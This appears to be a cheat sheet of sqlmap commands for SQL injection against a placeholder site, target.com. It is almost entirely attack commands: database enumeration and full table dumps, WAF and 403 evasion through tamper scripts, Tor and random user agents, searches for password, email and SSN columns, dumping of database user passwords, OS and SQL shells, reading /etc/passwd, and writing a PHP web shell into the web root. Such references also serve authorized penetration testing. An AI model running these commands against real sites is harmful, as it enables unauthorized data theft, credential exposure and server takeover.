# Sqlmap Command Sheet

Reference: https://github.com/sqlmapproject/sqlmap/wiki/usage

### Basic Enumeration
| Goal | Command |
|---|---|
| List databases | `sqlmap -u "http://target.com/page.php?id=1" --dbs` |
| List tables in a DB | `sqlmap -u "http://target.com/page.php?id=1" -D dbname --tables` |
| List columns in a table | `sqlmap -u "http://target.com/page.php?id=1" -D dbname -T tablename --columns` |
| Dump entire table | `sqlmap -u "http://target.com/page.php?id=1" -D dbname -T tablename --dump` |
| Dump limited rows | `sqlmap -u "http://target.com/page.php?id=1" -D dbname -T tablename --dump --start=1 --stop=20` |
| Dump specific columns | `sqlmap -u "http://target.com/page.php?id=1" -D dbname -T tablename --dump -C "col1,col2,col3"` |
### WAF / 403 Bypass
| Goal | Command |
|---|---|
| Random User-Agent | `--random-agent` |
| Tamper scripts | `--tamper=space2comment` |
| Multiple tamper scripts | `--tamper=space2comment,between,randomcase` |
| Delay between requests | `--delay=1` |
| Increase timeout | `--timeout=10` |
| Use HTTP(S) proxy | `--proxy="http://127.0.0.1:8080"` |
| Tor proxy | `--tor --tor-type=SOCKS5` |
| Randomize a parameter's value | `--randomize=id` |
| Skip URL encoding | `--skip-urlencode` |
| Use stealthier level/risk | `--level=1 --risk=1` (default, slower but quieter) |
### Authentication & Headers
| Goal | Command |
|---|---|
| Cookie | `--cookie="PHPSESSID=abc123"` |
| Custom header | `--headers="X-Forwarded-For: 127.0.0.1"` |
| HTTP auth | `--auth-type=Basic --auth-cred="user:pass"` |
| POST data | `-u "http://target.com/login.php" --data="user=admin&pass=test"` |
### Injection Point Control
| Goal | Command |
|---|---|
| Specify injection param | `-p "id"` |
| Test all GET params | `--level=5 --risk=3` |
| Skip specific params | `--skip="token,captcha"` |
| Provide param in URL | `-u "http://target.com/page.php?id=1&cat=5"` |
| From POST body | `-u "http://target.com/api" --data="id=1"` |
### Data Extraction Options
| Goal | Command |
|---|---|
| Search for columns | `--search -C "password,email,ssn"` |
| Get DB user | `--current-user` |
| Get DB name | `--current-db` |
| Get DB version banner | `--banner` |
| Check if DBA (admin) | `--is-dba` |
| List DB users | `--users` |
| List DB user passwords | `--passwords` |
| OS shell (if file privs) | `--os-shell` |
| SQL shell | `--sql-shell` |
### Read/Write Files (requires FILE privilege)
| Goal | Command |
|---|---|
| Read file | `--file-read="/etc/passwd"` |
| Write file | `--file-write="/tmp/shell.php" --file-dest="/var/www/html/shell.php"` |
### Output & Session
| Goal | Command |
|---|---|
| Resume saved session | (automatic; just run the same URL again) |
| Flush session | `--flush-session` |
| Output to CSV/TSV | auto-generated under `~/.local/share/sqlmap/output/` (Linux) or `%LOCALAPPDATA%\sqlmap\output\` (Windows) |
| Batch mode (accept default answers, no prompts) | `--batch` |
---
### Common Combo (new site — full recon)
```bash
sqlmap -u "http://target.com/page.php?id=1" --random-agent --tamper=space2comment --batch --dbs
```
### Common Combo (dump specific table with bypass)
```bash
sqlmap -u "http://target.com/page.php?id=1" -D targetdb -T users --dump --random-agent --tamper=space2comment --batch --start=1 --stop=50
```
### If you have a request file (from Burp/ZAP)
```bash
sqlmap -r request.txt --batch
```

